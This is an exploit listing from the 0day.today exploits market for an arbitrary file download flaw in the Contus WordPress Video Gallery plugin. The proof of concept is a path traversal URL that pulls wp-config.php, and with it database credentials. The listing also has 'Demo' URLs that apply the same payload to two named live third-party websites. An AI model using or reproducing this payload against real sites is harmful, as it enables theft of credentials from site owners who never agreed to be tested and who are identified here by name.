[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Video Gallery Arbitrary File Download Vulnerability

Author
X-Line
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-23207
Category
web applications
Date add
29-01-2015
Platform
php
######################
# Exploit Title: Wordpress Plugins - Wordpress Video Gallery Arbitrary File Download Vulnerability
# Date: 17/01/2015
# Exploit Author: X-Line ( Empire North ) From  Tetouan
# Vendor Homepage: Dork : www.hdflvplayer.net
# Software Link: http://www.hdflvplayer.net/
# Tested on: Win8, Linux
# Google Dork: use your Braain ;)
######################
   
# Proof of Concept
 
http://[target]/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
  
 
#Demo
 
http://www.gerardbattenmep.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
http://kleenradio.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
 
 
Greetz to : HeroHero & all Membre Herochima .. Nik nik nik ... 7alwa 7alwa 7alwa.. stk stk stk ...3etina niko a7ambak :( [Klipcha]

#  0day.today [2024-09-28]  #